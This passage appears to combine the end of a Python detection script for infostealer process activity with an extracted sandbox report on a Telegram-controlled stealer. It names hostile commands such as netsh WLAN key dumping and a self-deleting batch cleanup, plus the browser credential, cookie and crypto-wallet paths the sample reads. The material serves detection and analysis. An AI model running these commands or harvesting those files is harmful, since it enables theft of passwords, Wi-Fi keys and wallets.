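    {"pid": 5011, "ppid": 5010, "image": r"C:\Windows\SysWOW64\chcp.com", "cmd": "chcp 65001"},
    {"pid": 5012, "ppid": 5010, "image": r"C:\Windows\SysWOW64\netsh.exe", "cmd": "netsh wlan show profiles"},
    {"pid": 5013, "ppid": 5010, "image": r"C:\Windows\SysWOW64\findstr.exe", "cmd": "findstr All"},
    {"pid": 5020, "ppid": 4524, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat'
            r' & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat'},
    {"pid": 5021, "ppid": 5020, "image": r"C:\Windows\SysWOW64\chcp.com", "cmd": "chcp 65001"},
    {"pid": 5022, "ppid": 5020, "image": r"C:\Windows\SysWOW64\taskkill.exe", "cmd": "TaskKill /F /IM 4524"},
    {"pid": 5023, "ppid": 5020, "image": r"C:\Windows\SysWOW64\timeout.exe", "cmd": "Timeout /T 2 /Nobreak"},
    {"pid": 5024, "ppid": 5020, "image": r"C:\Windows\SysWOW64\taskkill.exe", "cmd": "TaskKill /F /IM 4524"},
]

# "wlan show profiles" lists saved networks; "wlan show profile name=X key=clear" dumps the PSK
WLAN_PROFILE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)
WLAN_KEY_CLEAR = re.compile(r"\bkey\s*=\s*clear\b", re.I)
# cmd /C <x>.bat & Del <x>.bat: the batch file removes itself after running (unquoted paths only)
SELF_DELETING_BAT = re.compile(r"/C\s+(\S+\.bat)\s*&\s*Del\s+(\S+\.bat)", re.I)
# taskkill /IM expects an image name; a bare number is a PID handed to the wrong switch
TASKKILL_IM_NUMERIC = re.compile(r"\btaskkill\b.*?/IM\s+(\d+)\b", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) findings over a list of process-creation events."""
    findings = []
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    for e in events:
        name, cmd = image_name(e["image"]), e["cmd"]
        if name == "netsh.exe" and WLAN_PROFILE.search(cmd):
            rule = "wlan_key_export" if WLAN_KEY_CLEAR.search(cmd) else "wlan_profile_enum"
            findings.append((rule, e["pid"], cmd))
        if name == "cmd.exe":
            m = SELF_DELETING_BAT.search(cmd)
            if m and m.group(1).lower() == m.group(2).lower():
                findings.append(("self_deleting_batch", e["pid"], m.group(1)))
        if name == "taskkill.exe":
            m = TASKKILL_IM_NUMERIC.search(cmd)
            if m:
                findings.append(("taskkill_pid_as_image_name", e["pid"], m.group(1)))

    # Sequence rule: one cmd.exe spawning both taskkill and timeout is the kill, wait, delete loop
    for ppid, kids in children.items():
        names = {image_name(k["image"]) for k in kids}
        if {"taskkill.exe", "timeout.exe"} <= names:
            targets = {m.group(1) for k in kids for m in [TASKKILL_IM_NUMERIC.search(k["cmd"])] if m}
            findings.append(("kill_wait_delete_sequence", ppid, ",".join(sorted(targets)) or "n/a"))
    return findings


def rules_fired(events):
    """Distinct rule names that fired, sorted for stable comparison."""
    return sorted({f[0] for f in detect(events)})


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The netsh rule fires on the listing step alone because the key=clear step is frequently run per SSID from inside the malware rather than via a visible child process; treat wlan_profile_enum from a non-interactive parent as the alert and wlan_key_export as confirmation when it appears.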

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC60000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC02000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000032D6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: pathToSignedReportingExe: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match; File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match; File source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
Source: Yara match; File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match; File source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: Electrum
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: JaxxxLiberty
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Exodus\exodus.wallet
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Ethereum\keystore
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ExodusWeb3 Wallet
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: Ethereum
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Ethereum\keystore
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match; File source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
MITRE ATT&CK Matrix (the rendered grid is not recoverable from the extracted text). Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
Technique cells carrying a signature match count in the extracted matrix: Scripting, Windows Management Instrumentation, Process Injection, Virtualization/Sandbox Evasion, OS Credential Dumping, Security Software Discovery, Email Collection, Web Service, Native API, DLL Side-Loading, Disable or Modify Tools, Archive Collected Data, Encrypted Channel, Process Discovery, Data from Local System, Ingress Tool Transfer, Obfuscated Files or Information, Application Window Discovery, Clipboard Data, Non-Application Layer Protocol, Timestomp, System Network Configuration Discovery, Application Layer Protocol, File and Directory Discovery, System Information Discovery.
Behavior Graph (ID: 1576963; Sample: zyEDYRU0jw.exe; Startdate: 17/12/2024; Architecture: WINDOWS; Score: 100). The rendered graph is not recoverable from the extracted text; the nodes and edges it carried:

Network nodes:
- api.telegram.org (149.154.167.220, 443, 49757; TELEGRAMRU; United Kingdom); signature attached: Uses the Telegram API (likely for C&C communication)
- icanhazip.com (104.16.184.241, 49756, 80; CLOUDFLARENETUS; United States)
- 90.168.9.0.in-addr.arpa

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 6 other signatures.

Process tree:
- zyEDYRU0jw.exe (started); signatures: Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines); Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines); Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines); 11 other signatures
  - cmd.exe (started); signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
    - tasklist.exe (started)
    - conhost.exe (started)
  - cmd.exe (started)
    - netsh.exe (started)
    - conhost.exe (started)
    - findstr.exe (started)
    - chcp.com (started)
  - WerFault.exe (started); dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
  - cmd.exe (started)
    - taskkill.exe (started)
    - conhost.exe (started)
    - 2 other processes

Source | Detection | Scanner | Label
zyEDYRU0jw.exe | 63% | ReversingLabs | ByteCode-MSIL.Infostealer.Polazert
zyEDYRU0jw.exe | 100% | Avira | HEUR/AGEN.1307083
zyEDYRU0jw.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://mega.nz%https://roblox.com%https://cpanel.net | 0% | Avira URL Cloud | safe
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
https://x.com-https://ads.google.com-https://pay.google.com | 0% | Avira URL Cloud | safe
https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep | 0% | Avira URL Cloud | safe
http://api.telegram.orgd | 0% | Avira URL Cloud | safe
https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github. | 0% | Avira URL Cloud | safe
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
icanhazip.com | 104.16.184.241 | true | false | | high
90.168.9.0.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | false | | high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | false | | high
https://duckduckgo.com/ac/?q= | tmp61E8.tmp.dat.0.dr | false | | high
https://x.com-https://ads.google.com-https://pay.google.com | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr | false | | high
https://api.telegram.org/bot | zyEDYRU0jw.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmp61E8.tmp.dat.0.dr | false | | high
https://support.google.com/chrome/?p=plugin_flash | zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github. | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | false | | high
http://icanhazip.com/0 | zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | tmp61E8.tmp.dat.0.dr | false | | high
https://www.google.com | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004417000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | false | | high
https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | false | | high
https://mega.nz%https://roblox.com%https://cpanel.net | zyEDYRU0jw.exe | false | Avira URL Cloud: safe | unknown
https://ozon.ru | zyEDYRU0jw.exe | false | | high
http://www.quovadis.bm0 | zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.orgd | zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com | zyEDYRU0jw.exe | false | | high
https://ocsp.quovadisoffshore.com0 | zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmp61E8.tmp.dat.0.dr | false | | high
https://gemini.google.com/app?q= | tmp61E8.tmp.dat.0.dr | false | | high
https://ipinfo.io/# | zyEDYRU0jw.exe | false | | high
https://gmail.com | zyEDYRU0jw.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.16.184.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1576963
                                                                            Start date and time:2024-12-17 19:52:30 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 6m 51s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                            Run name:Suspected VM Detection
Number of new started processes analysed: 19
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:zyEDYRU0jw.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@25/18@3/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 48
                                                                            • Number of non-executed functions: 8
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.29.9
                                                                            • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: zyEDYRU0jw.exe
Time | Type | Description
13:54:41 | API Interceptor | 61x Sleep call for process: zyEDYRU0jw.exe modified
13:54:51 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | dP5z8RpEyQ.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer |
149.154.167.220 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Order129845.exe | malicious | AgentTesla |
104.16.184.241 | itLDZwgFNE.exe | malicious | Flesh Stealer | icanhazip.com/
104.16.184.241 | 3gJQoqWpxb.bat | malicious | Unknown | icanhazip.com/
104.16.184.241 | 7fE6IkvYWf.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | T05Dk6G8fg.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | VaXmr82RIb.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | Pdf Reader.exe | malicious | Stealerium | icanhazip.com/
104.16.184.241 | gKWbina3a4.bat | malicious | Stealerium | icanhazip.com/
104.16.184.241 | uyz4YPUyc9.exe | malicious | Stealerium | icanhazip.com/
104.16.184.241 | yv7QsAR49V.exe | malicious | Stealerium | icanhazip.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
icanhazip.com | itLDZwgFNE.exe | malicious | Flesh Stealer | 104.16.184.241
icanhazip.com | 3gJQoqWpxb.bat | malicious | Unknown | 104.16.184.241
icanhazip.com | CVmkXJ7e0a.exe | malicious | SheetRat | 104.16.185.241
icanhazip.com | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 104.16.185.241
icanhazip.com | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 104.16.185.241
icanhazip.com | 7fE6IkvYWf.exe | malicious | Unknown | 104.16.184.241
icanhazip.com | iGxCM2I5u9.exe | malicious | Flesh Stealer | 104.16.185.241
icanhazip.com | T05Dk6G8fg.exe | malicious | Unknown | 104.16.184.241
icanhazip.com | 3K5MXGVOJE.exe | malicious | Unknown | 104.16.185.241
api.telegram.org | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | dP5z8RpEyQ.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 149.154.167.220
api.telegram.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Order129845.exe | malicious | AgentTesla | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Setup.msi | malicious | Vidar | 149.154.167.99
TELEGRAMRU | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | dP5z8RpEyQ.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 149.154.167.220
TELEGRAMRU | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | hngarm13de02.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
CLOUDFLARENETUS | http://kmaybelsrka.sbs:6793/bab.zip | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer | 172.64.41.3
CLOUDFLARENETUS | https://garfieldthecat.tech/Receipt.html | malicious | WinSearchAbuse | 162.159.61.3
CLOUDFLARENETUS | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer | 104.21.2.110
CLOUDFLARENETUS | Documento_Contrato_Seguro_18951492.msi | malicious | AteraAgent | 104.18.21.76
CLOUDFLARENETUS | Documento_Contrato_Seguro_25105476.msi | malicious | AteraAgent | 104.18.21.76
CLOUDFLARENETUS | http://sharefileon.com | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://www.kukaj-to.chat/sedo | malicious | Unknown | 104.21.50.223
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | hngarm13de02.bat | malicious | Abobus Obfuscator, Braodo | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://escrowmedifllc.hostconstructionapp.com | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | BBVA S.A..vbs | malicious | Remcos | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
